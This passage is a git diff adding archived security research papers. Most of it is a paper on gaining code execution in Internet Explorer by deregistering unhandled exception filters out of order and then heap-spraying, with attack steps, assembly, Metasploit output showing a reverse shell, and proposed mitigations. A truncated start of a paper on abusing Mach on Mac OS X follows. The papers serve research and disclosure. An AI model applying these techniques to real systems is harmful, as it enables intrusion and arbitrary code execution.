of the top-level unhandled exception filter +by taking advantage of a design flaw in the way unhandled exception +filters are chained. This approach, however, is limited by an attacker's +ability to control the chaining of unhandled exception filters, such as +through the loading and unloading of DLLs. This does reduce the global +impact of this approach; however, there are some interesting cases where +it can be immediately applied, such as with Internet Explorer. + +Disclaimer: This document was written in the interest of education. The +authors cannot be held responsible for how the topics discussed in this +document are applied. + +Thanks: The authors would like to thank H D Moore, and everyone who +learns because it's fun. + +Update: This issue has now been addressed by the patch included in +MS06-051. A complete analysis has not yet been performed to ensure that +it patches all potential vectors. + +With that, on with the show... + + +2) Introduction + +In the security field, software bugs can be generically grouped into two +categories: exploitable or non-exploitable. If a software bug is +exploitable, then it can be leveraged to the advantage of the attacker, +such as to gain arbitrary code execution. However, if a software bug is +non-exploitable, then it is not possible for the attacker to make use of +it for anything other than perhaps crashing the application. In more +cases than not, software bugs will fall into the category of being +non-exploitable simply because they typically deal with common mistakes +or invalid assumptions that are not directly related to buffer +management or loop constraints. This can be frustrating during auditing +and product analysis from an assessment standpoint. With that in mind, +it only makes sense to try think of ways to turn otherwise +non-exploitable issues into exploitable issues. + +In order to accomplish this feat, it's first necessary to try to +consider execution vectors that could be redirected to code that the +attacker controls after triggering a non-exploitable bug, such as a NULL +pointer dereference. For starters, it is known that the triggering of a +NULL pointer dereference will cause an access violation exception to be +dispatched. When this occurs, the user-mode exception dispatcher will +call the registered exception handlers for the thread that generated the +exception, allowing each the opportunity to handle the exception. If +none of the exception handlers know what to do with it, the user-mode +exception dispatcher will call the top-level unhandled exception filter +(UEF) via kernel32!UnhandledExceptionFilter (if one has been set). The +implementation of a function that is set as the registered top-level UEF +is not specified, but in most cases it will be designed to pass +exceptions that it cannot handle onto the top-level UEF that was +registered previously, effectively creating a chain of UEFs. This +process will be explained in more detail in the next chapter. + +Aside from the exception dispatching process, there are not any other +controllable execution vectors that an attacker might be able to +redirect without some other situation-specific conditions. For that +reason, the most important place to look for a point of redirection is +within the exception dispatching process itself. This will provide a +generic means of gaining execution control for any bug that can be made +to crash an application. + +Since the first part of the exception dispatching process is the calling +of registered exception handlers for the thread, it may make sense to +see if there are any controllable execution paths taken by the +registered exception handlers at the time that the exception is +triggered. This may work in some cases, but is not universal and +requires analysis of the specific exception handler routines. Without +having an ability to corrupt the list of exception handlers, there is +likely to be no other method of redirecting this phase of the exception +dispatching process. + +If none of the registered exception handlers can be redirected, one must +look toward a method that can be used to redirect the unhandled +exception filter. This could be accomplished by changing the function +pointer to call into controlled code as illustrated in[1,3]. However, +Microsoft has taken steps in XPSP2, such as encoding the function +pointer that represents the top-level UEF[4]. This no longer makes it +feasible to directly overwrite the global variable that contains the +top-level UEF. With that in mind, it may also make sense to look at the +function associated with top-level UEF at the time that the exception is +dispatched in order to see if the function itself has any meaningful way +to redirect its execution. + +From this initial analysis, one is left with being required to perform +an application-dependent analysis of the registered exception handlers +and UEFs that exist at the time that the exception is dispatched. Though +this may be useful in some situations, they are likely to be few and far +between. For that reason, it makes sense to try to dive one layer +deeper to learn more about the exception dispatching process. Chapter +will describe in more detail how unhandled exception filters work, +setting the stage for the focus of this paper. Based on that +understanding, chapter will expound upon an approach that can be used +to gain indirect control of the top-level UEF. Finally, chapter will +formalize the results of this analysis in an example of a working +exploit that takes advantage of one of the many NULL pointer +dereferences in Internet Explorer to gain arbitrary code execution. + + +3) Understanding Unhandled Exception Filters + +This chapter provides an introductory background into the way unhandled +exception filters are registered and how the process of filtering an +exception that is not handled actually works. This information is +intended to act as a base for understanding the attack vector described +in chapter . If the reader already has sufficient understanding of the +way unhandled exception filters operate, feel free to skip ahead. + + +3.1) Setting the Top-Level UEF + +In order to make it possible for applications to handle all exceptions +on a process-wide basis, the exception dispatcher exposes an interface +for registering an unhandled exception filter. The purpose of the +unhandled exception filter is entirely application specific. It can be +used to log extra information about an unhandled exception, perform some +advanced error recovery, handle language-specific exceptions, or any +sort of other task that may need to be taken when an exception occurs +that is not handled. To specify a function that should be used as the +top-level unhandled exception filter for the process, a call must be +made to kernel32!SetUnhandledExceptionFilter which is prototyped as[6]: + + +LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter( + LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter + ); + +When called, this function will take the function pointer passed in as +the lpTopLevelExceptionFilter argument and encode it using +kernel32!RtlEncodePointer. The result of the encoding will be stored in +the global variable kernel32!BasepCurrentTopLevelFilter, thus +superseding any previously established top-level filter. The previous +value stored within this global variable is decoded using +kernel32!RtlDecodePointer and returned to the caller. Again, the +encoding and decoding of this function pointer is intended to prevent +attackers from being able to use an arbitrary memory overwrite to +redirect it as has been done pre-XPSP2. + +There are two reasons that kernel32!SetUnhandledExceptionFilter returns +a pointer to the original top-level UEF. First, it makes it possible to +restore the original top-level UEF at some point in the future. Second, +it makes it possible to create an implicit ``chain'' of UEFs. In this +design, each UEF can make a call down to the previously registered +top-level UEF by doing something like the pseudo code below: + + +... app specific handling ... + +if (!IsBadCodePtr(PreviousTopLevelUEF)) + return PreviousTopLevelUEF(ExceptionInfo); +else + return EXCEPTION_CONTINUE_SEARCH; + +When a block of code that has registered a top-level UEF wishes to +deregister itself, it does so by setting the top-level UEF to the value +that was returned from its call to kernel32!SetUnhandledExceptionFilter. +The reason it does it this way is because there is no true list of +unhandled exception filters that is maintained. This method of +deregistering has one very important property that will serve as the +crux of this document. Since deregistration happens in this fashion, +the register and deregister operations associated with a top-level UEF +must occur in symmetric order. + +In one example, the top-level UEF Fx is registered, returning Nx as the +previous top-level UEF. Following that, Gx is registered, returning Fx +as the previous value. After some period of time, Gx is deregistered by +setting Fx as the top-level UEF, thus returning the top-level UEF to the +value it contained before Gx was registered. Finally, Fx deregisters by +setting Nx as the top-level UEF. + + +3.2) Handling Unhandled Exceptions + +When an exception goes through the initial phase of the exception +dispatching process and is not handled by any of the registered +exception handlers for the thread that the exception occurred in, the +exception dispatcher must take one final stab at getting it handled +before forcing the application to terminate. One of the options the +exception dispatcher has at this point is to pass the exception to a +debugger, assuming one is attached. Otherwise, it has no choice but to +try to handle the exception internally and abort the application if that +fails. To allow this to happen, applications can make a call to the +unhandled exception filter associated with the process as described in [5]. +In the general case, calling the unhandled exception filter will result +in kernel32!UnhandledExceptionFilter being called with information about +the exception being dispatched. + +The job of kernel32!UnhandledExceptionFilter is two fold. First, if a +debugger is not present, it must make a call to the top-level UEF +registered with the process. The top-level UEF can then attempt to +handle the exception, possibly recovering and allowing execution to +continue, such as by returning EXCEPTION_CONTINUE_EXECUTION. Failing +that, it can either forcefully terminate the process, typically by +returning EXCEPTION_EXECUTE_HANDLER or allow the normal error reporting +dialog to be displayed by returning EXCEPTION_CONTINUE_SEARCH. If a +debugger is present, the unhandled exception filter will attempt to pass +the exception on to the debugger in order to give it a chance to handle +the exception. When this occurs, the top-level UEF is not called. This +is important to remember as the paper goes on, as it can be a source of +trouble if one forgets this fact. + +When operating with no debugger present, +kernel32!UnhandledExceptionFilter will attempt to decode the function +pointer associated with the top-level UEF by calling +kernel32!RtlDecodePointer on the global variable that contains the +top-level UEF, kernel32!kernel32!BasepCurrentTopLevelFilter, as shown +below: + + +7c862cc1 ff35ac33887c push dword ptr [kernel32!BasepCurrentTopLevelFilter] +7c862cc7 e8e1d6faff call kernel32!RtlDecodePointer (7c8103ad) + +If the value returned from kernel32!RtlDecodePointer is not NULL, then a +call is made to the now-decoded top-level UEF function, passing the +exception information on: + + +7c862ccc 3bc7 cmp eax,edi +7c862cce 7415 jz kernel32!UnhandledExceptionFilter+0x15b (7c862ce5) +7c862cd0 53 push ebx +7c862cd1 ffd0 call eax + +The return value of the filter will control whether or not the +application continues execution, terminates, or reports an error and +terminates. + + +3.3) Uses for Unhandled Exception Filters + +In most cases, unhandled exception filters are used for +language-specific exception handling. This usage is all done +transparently to programmers of the language. For instance, C++ code +will typically register an unhandled exception filter through +CxxSetUnhandledExceptionFilter during CRT initialization as called from +the entry point associated with the program or shared library. +Likewise, C++ will typically deregister the unhandled exception filter +that it registers by calling CxxRestoreUnhandledExceptionFilter during +program termination or shared library unloading. + +Other uses include programs that wish to do advanced error reporting or +information collection prior to allowing an application to terminate due +to an unhandled exception. + + +4) Gaining Control of the Unhandled Exception Filter + +At this point, the only feasible vector for gaining control of the +top-level UEF is to cause calls to be made to +kernel32!SetUnhandledExceptionFilter. This is primarily due to the fact +that the global variable has the current function pointer encoded. One +could consider attempting to cause code to be redirected directly to +kernel32!SetUnhandledExceptionFilter, but doing so would require some +kind of otherwise-exploitable vulnerability in an application, thus +making it not useful in the context of this document. + + +Given these restrictions, it makes sense to think a little bit more +about the process involved in registering and deregistering UEFs. Since +the chain of registered UEFs is implicit, it may be possible to cause +that chain to become corrupt or invalid in some way that might be +useful. One of the requirements that is known about the registration +process for top-level UEFs is that the register and deregister +operations must be symmetric. What happens if they aren't, though? +Consider the following example where Fx and Gx are registered and +deregistered, but in asymmetric order. + +In this example, Fx and Gx are registered first. Following that, Fx is +deregistered prior to deregistering Gx, thus making the operation +asymmetrical. As a result of Fx deregistering first, the top-level UEF +is set to Nx, even though Gx should technically still be a part of the +chain. Finally, Gx deregisters, setting the top-level UEF to Fx even +though Fx had been previously deregistered. This is obviously incorrect +behavior, but the code associated with Gx has no idea that Fx has been +deregistered due to the implicit chain that is created. + +If asymmetric registration of UEFs can be made to occur, it might be +possible for an attacker to gain control of the top-level UEF. Consider +for a moment that the register and deregister operations in the diagram +in figure occur during DLL load and unload, respectively. If that is +the case, then after deregistration occurs, the DLLs associated with the +UEFs will be unloaded. This will leave the top-level UEF set to Fx +which now points to an invalid region of memory. If an exception occurs +after this point and is not handled by a registered exception handler, +the unhandled exception filter will be called. If a debugger is not +attached, the top-level UEF Fx will be called. Since Fx points to +memory that is no longer associated with the DLL that contained Fx, the +process will terminate --- or worse. + +From a security prospective, the act of leaving a dangling function +pointer that now points to unallocated memory can be a dream come true. +If a scenario such as this occurs, an attacker can attempt to consume +enough memory that will allow them to store arbitrary code at the +location that the function originally resided. In the event that the +function is called, the attacker's arbitrary code will be executed +rather than the code that was was originally at that location. In the +case of the top-level UEF, the only thing that an attacker would need to +do in order to cause the function pointer to be called is to generate an +unhandled exception, such as a NULL pointer dereference. + +All of these details combine to provide a feasible vector for executing +arbitrary code. First, it's necessary to be able to cause at least two +DLLs that set UEFs to be deregistered asymmetrically, thus leaving the +top-level UEF pointing to invalid memory. Second, it's necessary to +consume enough memory that attacker controlled code can reside at the +location that one of the UEF functions originally resided. Finally, an +exception must be generated that causes the top-level UEF to be called, +thus executing the attacker's arbitrary code. + +The big question, though, is how feasible is it to really be able to +control the registering and deregistering of UEFs? To answer that, +chapter provides a case study on one such application where it's all +too possible: Internet Explorer. + + +5) Case Study: Internet Explorer + +Unfortunately for Internet Explorer, it's time for it to once again dawn +the all-too-exploitable hat and tell us about how it can be used as a +medium to gain arbitrary code execution with all otherwise +non-exploitable bugs. In this approach, Internet Explorer is used as a +medium for causing DLLs that register and deregister top-level UEFs to +be loaded and unloaded. One way in which an attacker can accomplish +this is by using Internet Explorer's facilities for instantiating COM +objects from within the browser. This can be accomplished either by +using the new ActiveXObject construct in JavaScript or by using the HTML +OBJECT tag. + +In either case, when a COM object is being instantiated, the DLL +associated with that COM object will be loaded into memory if the object +instance is created using the INPROC_SERVER. When this happens, the COM +object's DllMain will be called. If the DLL has an unhandled exception +filter, it may be registered during CRT initialization as called from +the DLL's entry point. This takes care of the registering of UEFs, so +long as COM objects that are associated with DLLs that set UEFs can be +found. + +To control the deregister phase, it is necessary to somehow cause the +DLLs associated with the previously instantiated COM objects to be +unloaded. One approach that can be taken to do this is attempt to +leverage the locations that ole32!CoFreeUnusedLibrariesEx is called +from. One particular place that it's called from is during the closure +of an Internet Explorer window that once hosted the COM object. When +this function is called, all currently loaded COM DLLs will have their +DllCanUnloadNow routines called. If the routine returns SOK, such as +when there are no outstanding references to COM objects hosted by the +DLL, then the DLL can be unloaded. + +Now that techniques for controlling the loading and unloading of DLLs +that set UEFs has been identified, it's necessary to come up with an +implementation that will allow the deregister phase to occur +asymmetrically. One method that can be used to accomplish this +illustrated by the registration phase and the deregistration +phase described below. + +Registration: + +1. Open window #1 +2. Instantiate COMObject1 +3. Load DLL 1 +4. SetUnhandledExceptionFilter(Fx) => Nx + +5. Open window #2 +6. Instantiate COMObject2 +7. Load DLL 2 +8. SetUnhandledExceptionFilter(Gx) => Fx + +In the example described above, two windows are opened, each of which +registers a UEF by way of a DLL that implements a specific COM object. +In this example, the first window instantiates COMObject1 which is +implemented by DLL 1. When DLL 1 is loaded, it registers a top-level +UEF Fx. Once that completes, the second window is opened which +instantiates COMObject2, thus causing DLL 2 to be loaded which also +registers a top-level UEF, Gx. Once these operations complete, DLL 1 +and DLL 2 are still resident in memory and the top-level UEF points to +Gx. + +To gain control of the top-level UEF, Fx and Gx will need to be +deregistered asymmetrically. To accomplish this, DLL 1 must be unloaded +before DLL 2. This can be done by closing the window that hosts +COMObject1, thus causing ole32!CoFreeUnusedLibrariesEx to be called +which results in DLL 1 being unloaded. Following that, the window that +hosts COMObject2 should be closed, once again causing unused libraries +to be freed and DLL 2 unloaded. The diagram below illustrates this process. + +Deregistration: + +1. Close window #1 +2. CoFreeUnusedLibrariesEx +3. Unload DLL 1 +4. SetUnhandledExceptionFilter(Nx) => Gx + +5. Close window #2 +6. CoFreeUnusedLibrariesEx +7. Unload DLL 2 +8. SetUnhandledExceptionFilter(Fx) => Nx + +After the process in figure completes, Fx will be the top-level UEF for +the process, even though the DLL that hosts it, DLL 1, has been +unloaded. If an exception occurs at this point in time, the unhandled +exception filter will make a call to a function that now points to an +invalid region of memory. + +At this point, an attacker now has reasonable control over the top-level +UEF but is still in need of some approach that can used to place his or +her code at the location that Fx resided at. To accomplish this, +attackers can make use of the heap-spraying[8, 7] technique that has been +commonly applied to browser-based vulnerabilities. The purpose of the +heap-spraying technique is to consume an arbitrary amount of memory that +results in the contents of the heap growing toward a specific address +region. The contents, or spray data, is arbitrary code that will result +in an attacker's direct or indirect control of execution flow once the +vulnerability is triggered. For the purpose of this paper, the trigger +is the generation of an arbitrary exception. + +As stated above, the heap-spraying technique can be used to place code +at the location that Fx resided. However, this is limited by whether or +not that location is close enough to the heap to be a practical target +for heap-spraying. In particular, if the heap is growing from +0x00480000 and the DLL that contains Fx was loaded at 0x7c800000, it +would be a requirement that roughly 1.988 GB of data be placed in the +heap. That is, of course, assuming that the target machine has enough +memory to contain this allocation (across RAM and swap). Not to mention +the fact that spraying that much data could take an inordinate amount of +time depending on the speed of the machine. For these reasons, it is +typically necessary for the DLL that contains Fx in this example +scenario to be mapped at an address that is as close as possible to a +region that the heap is growing from. + +During the research of this attack vector, it was found that all of the +COM DLLs provided by Microsoft on XPSP2 are compiled to load at higher +addresses which make them challenging to reach with heap-spraying, but +it's not impossible. Many 3rd party COM DLLs, however, are compiled +with a default load address of 0x00400000, thus making them perfect +candidates for this technique. Another thing to keep in mind is that +the preferred load address of a DLL is just that: preferred. If two +DLLs have the same preferred load address, or their mappings would +overlap, then obviously one would be relocated to a new location, +typically at a lower address close to the heap, when it is loaded. By +keeping this fact in mind, it may be possible to load DLLs that overlap, +forcing relocation of a DLL that sets a UEF that would otherwise be +loaded at a higher address. + +It is also very important to note that a COM object does not have to be +successfully instantiated for the DLL associated with it to be loaded +into memory. This is because in order for Internet Explorer to +determine whether or not the COM class can be created and is compatible +with one that may be used from Internet Explorer, it must load and query +various COM interfaces associated with the COM class. This fact is very +useful because it means that any DLL that hosts a COM object can be used +--- not just ones that host COM objects that can be successfully +instantiated from Internet Explorer. + +The culmination of all of these facts is a functional proof of concept +exploit for Windows XP SP2 and the latest version of Internet Explorer +with all patches applied prior to MS06-051. Its one requirement is that +the target have Adobe Acrobat installed. Alternatively, other 3rd party +(or even MS provided DLLs) can be used so long as they can be feasibly +reached with heap-spraying techniques. Technically speaking, this proof +of concept exploits a NULL pointer dereference to gain arbitrary code +execution. It has been implemented as an exploit module for the 3.0 +version of the Metasploit Framework. + +The following example shows this proof of concept in action: + + +msf exploit(windows/browser/ie_unexpfilt_poc) > exploit +[*] Started reverse handler +[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0 +[*] Server started. +[*] Exploit running as background job. +msf exploit(windows/browser/ie_unexpfilt_poc) > +[*] Sending stage (474 bytes) +[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059) + +msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1 +[*] Starting interaction with 1... + +Microsoft Windows XP [Version 5.1.2600] +(C) Copyright 1985-2001 Microsoft Corp. + +C:\Documents and Settings\mmiller\Desktop> + + +6) Mitigation Techniques + +In the interest of not presenting a problem without a solution, the authors +have devised a few different approaches that might be taken by Microsoft to +solve this issue. Prior to identifying the solution, it is important to +summarize the root of the problem. In this case, the authors feel that the +problem at hand is rooted around a design flaw with the way the unhandled +exception filter ``chain'' is maintained. In particular, the ``chain'' +management is an implicit thing which hinges on the symmetric registering and +deregistering of unhandled exception filters. In order to solve this design +problem, some mechanism must be put in place that will eliminate the +symmetrical requirement. Alternatively, the symmetrical requirement could be +retained so long as something ensured that operations never occurred out of +order. The authors feel that this latter approach is more complicated and +potentially not feasible. The following sections will describe a few different +approaches that might be used or considered to solve this issue. + +Aside from architecting a more robust implementation, this attack vector may +also be mitigated through conventional exploitation counter-measures, such as +NX and ASLR. + + +6.1) Behavioral Change to SetUnhandledExceptionFilter + +One way in which Microsoft could solve this issue would be to change the +behavior of kernel32!SetUnhandledExceptionFilter in a manner that allows it to +support true registration and deregistration operations rather than implicit +ones. This can be accomplished by making it possible for the function to +determine whether a register operation is occurring or whether a deregister +operation is occurring. + +Under this model, when a registration operation occurs, +kernel32!SetUnhandledExceptionFilter can return a dynamically generated context +that merely calls the routine that is previous to the one that was registered. +The fact that the context is dynamically generated makes it possible for the +function to distinguish between registrations and deregistrations. When the +function is called with a dynamically generated context, it can assume that a +deregistration operation os occurring. Otherwise, it must assume that a +registration operation is occurring. + +To ensure that the underlying list of registered UEFs is not corrupted, +kernel32!SetUnhandledExceptionFilter can be modified to ensure that when a +deregistration operation occurs, any dynamically generated contexts that +reference the routine being deregistered can be updated to call to the +next-previous routine, if any, or simply return if there is no longer a +previous routine. + + +6.2) Prevent Setting of non-image UEF + +One approach that could be used to solve this issue for the general case is the +modification of kernel32!SetUnhandledExceptionFilter to ensure that the +function pointer being passed in is associated with an image region. By adding +this check at the time this function is called, the attack vector described in +this document can be mitigated. However, doing it in this manner may have +negative implications for backward compatibility. For instance, there are +likely to be cases where this scenario happens completely legitimately without +malicious intent. If a check like this were to be added, a once-working +application would begin to fail due to the added security checks. This is not +an unlikely scenario. Just because an unhandled exception filter is is invalid +doesn't mean that it will eventually cause the application to crash because it +may, in fact, never be executed. + + +6.3) Prevent Execution of non-image UEF + +Like preventing the setting of a non-image UEF, it may also be +possible to to modify kernel32!UnhandledExceptionFilter to prevent execution of +the top-level UEF if it points to a non-image region. While this seems like it +would be a useful check and should solve the issue, the fact is that it does +not. Consider the scenario where a top-level UEF is set to an invalid address +due to asymmetric deregistration. Following that, the top-level UEF is set to +a new value which is the location of a valid function. After this point, if an +unhandled exception is dispatched, kernel32!UnhandledExceptionFilter will see +that the top-level UEF points to a valid image region and as such will call it. +However, the top-level UEF may be implemented in such a way that it will pass +exceptions that it cannot handle onto the previously registered top-level UEF. +When this occurs, the invalid UEF is called which may point to arbitrary code +at the time that it's executed. The fact that +kernel32!UnhandledExceptionFilter can filter non-image regions does not solve +the fact that uncontrolled UEFs may pass exceptions on up the chain. + + +7) Future Research + +With the technique identified for being able to control the top-level UEF by +taking advantage of asymmetric deregistration, future research can begin to +identify better ways in which to accomplish this. For instance, rather than +relying on child windows in Internet Explorer, there may be another vector +through which ole32!CoFreeUnusuedLibrariesEx can be called to cause the +asymmetric deregistration to occur By default, ole32!CoFreeUnusedLibrariesEx is +called every ten minutes, but this fact is not particulary useful in terms of +general exploitation. There may also be better and more refined techniques that +can be used to more accurately spray the heap in order to place arbitrary code +at the location that a defunct top-level UEF resided at. + +Aside from improving the technique itself, it is also prudent to consider other +software applications this could be affected by this. In most cases, this +technique will not be feasible due to an attacker's inability to control the +loading and unloading of DLLs. However, should a mechanism for accomplishing +this be exposed, it may indeed be possible to take advantage of this. + +One such target software application that the authors find most intriguing +would be IIS. If it were possible for a remote attacker to cause DLLs that use +UEFs to be loaded and unloaded in a particular order, such as by accessing +websites that load COM objects, then it may be possible for an attacker to +leverage this vector on a remote webserver. At the time of this writing, the +only approach that the authors are aware of that could permit this are remote +debugging features present in ASP.NET that allow for the instantiation of COM +objects that are placed in a specific allow list. This isn't a very common +configuration, and is also limited by which COM objects can be instantiated, +thus making it not particularly feasible. However, it is thought that other, +more feasible techniques may exist to accomplish this. + +Aside from IIS, the authors are also of the opinion that this attack vector +could be applied to many of the Microsoft Office applications, such as Excel +and Word. These suites are thought to be vulnerable due to the fact that they +permit the instantiation and embedding of arbitrary COM objects in the document +files. If it were possible to come up with a way to control the loading and +unloading of DLLs through these instantiations, it may be possible to take +advantage of the flaw outlined in this paper. One particular way in which this +may be possible is through the use of macros, but this has a lesser severity +because it would require some form of user interaction to permit the execution +of macros. + +Another interesting application that may be susceptible to this attack is +Microsoft SQL server. Due to the fact that SQL server has features that permit +the loading and unloading of DLLs, it may be possible to leverage a SQL +injection attack in a way that makes it possible to gain control of the +top-level UEF by causing certain DLLs to be loaded and unloaded However, given +the ability to load DLLs, there are likely to be other techniques that can be +used to gain code execution as well. Once that occurs, a large query with +predictable results could be used as a mechanism to spray the heap. This type +of attack could even be accomplished through something as innocuous as a +website that is merely backed against the SQL server. Remember, attack vectors +aren't always direct. + + +8) Conclusion + +The title of this paper implies that an attacker has the ability to leverage +code execution of bugs that would otherwise not be useful, such as NULL pointer +dereferences. To that point, this paper has illustrated a technique that can +be used to gain control of the top-level unhandled exception filter for an +application by making the registration and deregistration process asymmetrical. +Once the top-level UEF has been made to point to invalid memory, an attacker +can use techniques like heap-spraying to attempt to place attacker controlled +code at the location that the now-defunct top-level UEF resided at. Assuming +this can be accomplished, an attacker simply needs to be able to trigger an +unhandled exception to cause the execution of arbitrary code. + +The crux of this attack vector is in leveraging a design flaw in the +assumptions made by the way the unhandled exception filter ``chain'' is +maintained. In particular, the design assumes that calls made to register, and +subsequently deregister, an unhandled exception filter through +kernel32!SetUnhandledExceptionFilter will be done symmetrically. However, this +cannot always be controlled, as DLLs that register unhandled exception filters +are not always guaranteed to be loaded and unloaded in a symmetric fashion. If +an attacker is capable of controlling the order in which DLLs are loaded and +unloaded, then they may be capable of gaining arbitrary code execution through +this technique, such as was illustrated in the Internet Explorer case study in +chapter . + +While not feasible in most cases, this technique has been proven to work in at +least one critical application: Internet Explorer. Going forward, other +applications, such as IIS, may also be found to be susceptible to this attack +vector. All it will take is a little creativity and the right set of +conditions. + + +Bibliography + +[1] Conover, Matt and Oded Horovitz. Reliable Windows Heap Exploits. +http://cansecwest.com/csw04/csw04-Oded+Connover.ppt; accessed +May 6, 2006. + + +[2] Kazienko, Przemyslaw and Piotr Dorosz. Hacking an SQL Server. +http://www.windowsecurity.com/articles/HackinganSQLServer.html; +accessed May 7, 2006. + + +[3] Litchfield, David. Windows Heap Overflows. +http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt; +accessed May 6, 2006. + + +[4] Howard, Michael. Protecting against Pointer Subterfuge (Kinda!). +http://blogs.msdn.com/michael_howard/archive/2006/01/30/520200.aspx; +accessed May 6, 2006. + + +[5] Microsoft Corporation. UnhandledExceptionFilter. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/unhandledexceptionfilter.asp; +accessed May 6, 2006. + + +[6] Microsoft Corporation. SetUnhandledExceptionFilter. +http://msdn.microsoft.com/library/default.asp?url=/library/en-us/debug/base/setunhandledexceptionfilter.asp; +accessed May 6, 2006. + +[7] Murphy, Matthew. Windows Media Player Plug-In Embed Overflow; +http://www.milw0rm.com/exploits/1505; accessed May +7, 2006. + + +[8] SkyLined. InternetExploiter. +http://www.edup.tudelft.nl/ bjwever/exploits/InternetExploiter2.zip; +accessed May 7, 2006. diff --git a/uninformed/4.6.txt b/uninformed/4.6.txt new file mode 100644 index 0000000..07cf397 --- /dev/null +++ b/uninformed/4.6.txt @@ -0,0 +1,1004 @@ +Abusing Mach on Mac OS X +May, 2006 +nemo +nemo@felinemenace.org + +1) Foreword + +Abstract: This paper discusses the security implications of Mach being +integrated with the Mac OS X kernel. A few examples are used to illustrate how +Mach support can be used to bypass some of the BSD security features, such as +securelevel. Furthermore, examples are given that show how Mach functions can +be used to supplement the limited ptrace functionality included in Mac OS X. + +Hello reader. I am writing this paper for two reasons. The first reason is to provide +some documentation on the Mach side of Mac OS X for people who are unfamiliar +with this and interested in looking into it. The second reason is to document my own +research, as I am fairly inexperienced with Mach programming. Because of this +fact, this paper may contain errors. If this is the case, please email me at +nemo@felinemenace.org and I will try to correct it. + + +2) Introduction + +This paper will try to provide a basic introduction to the Mach kernel +including its history and general design. From there, details will be +provided about how these concepts are implemented on Mac OS X. Finally, +this paper will illustrate some of the security concerns which arise +when trying to mix UNIX and Mach together. In this vein, I came across +an interesting quote from the Apple(.com) website [2]. + +``You can send messages to this port to start and stop the task, kill the task, +manipulate the tasks address space, and so forth. Therefore, whoever owns +a send right for a tasks port effectively owns the task and can manipulate +the tasks state without regard to BSD security policies or any higher-level +security policies.'' + +``In other words, an expert in Mach programming with local administrator access +to a Mac OS X machine can bypass BSD and higher-level security features.'' + +Sounds like a valid model on which to build a server platform to me... + + +3) History of Mach + +The Mach kernel began its life at the Carnegie Mellon University (CMU) [1] +and was originally based off an operating system named ``Accent''. +It was initially built inside the 4.2BSD kernel. As each of the Mach components +were written, the equivilant BSD component was removed and replaced. +Because of this fact, early versions of Mach were monolithic kernels, similar to +xnu, with BSD code and Mach combined. + +Mach was predominantly designed around the need for multi-processor +support. It was also designed as a Micro-kernel, however xnu, the +implementation used by Mac OS X, is not a micro-kernel. This is due to +the fact that the BSD code, as well as other subsystems, are included in +the kernel. + + +4) Basic Concepts + +This section will run over some of the high level concepts associated +with Mach. These concepts have been documented repeatedly by various +people who are vastly more talented at writing than I am. For that +reason, I advise you to follow some of the links provided in the +references section of this paper. + +Mach uses various abstractions to represent the components of the +system. These abstractions can be confusing for someone with a UNIX +background so I'll define them now. + + +4.1) Tasks + +A task is a logical representation of an execution environment. Tasks +are used in order to divide system resources between each running +program. Each task has its own virtual address space and privilege +level. Each task contains one or more threads. The tasks address space +and resources are shared between each of its threads. + +On Mac OS X, new tasks can be created using either the task_create() +function or the fork() BSD syscall. + + +4.2) Threads + +In Mach, a thread is an independent execution entity. Each thread has +its own registers and scheduling policies. Each thread has access to all +the elements within the task it is contained within. + +On Mac OS X, a list of all the threads in a task can be obtained using +the task_threads() function shown below. + + kern_return_t task_threads + (task_t task, + thread_act_port_array_t thread_list, + mach_msg_type_number_t* thread_count); + +The Mach API on Mac OS X provides a variety of functions for dealing with +threads. Through this API, new threads can easily be created, register contents +can be modified and retrieved, and so on. + + +4.3) Msgs + +Messages are used in Mach in order to provide communicate between +threads. A message is made up of a collection of data objects. Once a +message is created it is sent to a port for which the invoking task has +the appropriate port rights. Port rights can be sent between tasks as a +message. Messages are queued at the destination and processed at the +liberty of the receiving thread. + +On Mac OS X, the mach_msg() function be used to send and receive messages +to and from a port. The declaration for this function is shown below. + + mach_msg_return_t mach_msg + (mach_msg_header_t msg, + mach_msg_option_t option, + mach_msg_size_t send_size, + mach_msg_size_t receive_limit, + mach_port_t receive_name, + mach_msg_timeout_t timeout, + mach_port_t notify); + + +4.4) Ports + +A port is a kernel controlled communication channel. It provides the +ability to pass messages between threads. A thread with the appropriate +port rights for a port is able to send messages to it. Multiple ports +which have the appropriate port rights are able to send messages to a +single port concurrently. However, only a single task may receive +messages from a single port at any given time. Each port has an +associated message queue. + + +4.5) Port Set + +A port set is (unsurprisingly) a collection of Mach ports. Each of the +ports in a port set use the same queue of messages. + + +5) Mach Traps (system calls) + +In order to combine Mach and BSD into one kernel (xnu), syscall numbers +are divided into different tables. On a PowerPC system, when the ``sc'' +instruction is executed, the syscall number is stored in r0 and used to +determine which syscall to execute. Positive syscall numbers (smaller +than 0x6000) are treated as FreeBSD syscalls. In this case the sysent +table is offset and the appropriate function pointer is used. + +In cases where the syscall number is greater than 0x6000, PPC specific +syscalls are used and the ``PPCcalls'' table is offset. However, in the +case of a negative syscall number, the mach_trap_table is indexed and +used. + +The code below is taken from the xnu source and shows this process. + + oris r15,r15,SAVsyscall >> 16 ; Mark that it this is a + ; syscall + + cmplwi r10,0x6000 ; Is it the special ppc-only + ; guy? + stw r15,SAVflags(r30) ; Save syscall marker + beq-- cr6,exitFromVM ; It is time to exit from + ; alternate context... + + beq-- ppcscall ; Call the ppc-only system + ; call handler... + + mr. r0,r0 ; What kind is it? + mtmsr r11 ; Enable interruptions + + blt-- .L_kernel_syscall ; System call number if + ; negative, this is a mach call... + + lwz r8,ACT_TASK(r13) ; Get our task + cmpwi cr0,r0,0x7FFA ; Special blue box call? + beq-- .L_notify_interrupt_syscall ; Yeah, call it... + + +On an Intel system, things are a little different. The ``int 0x81'' (cd +81) instruction is used to call Mach traps. The ``sysenter'' instruction +is used for the BSD syscalls. However, the syscall number convention +remains the same. The eax register is used to store the syscall number +in either case. + + +It seems that most people developing shellcode on Mac OS X stick to +using the FreeBSD syscalls. This may be due to lack of familiarity with +Mach traps, so hopefully this paper is useful in re-mediating that. I +have extracted a list of the Mach traps in the mach_trap_table from the +xnu kernel. (792.6.22). + + +5.1) List of mach traps in 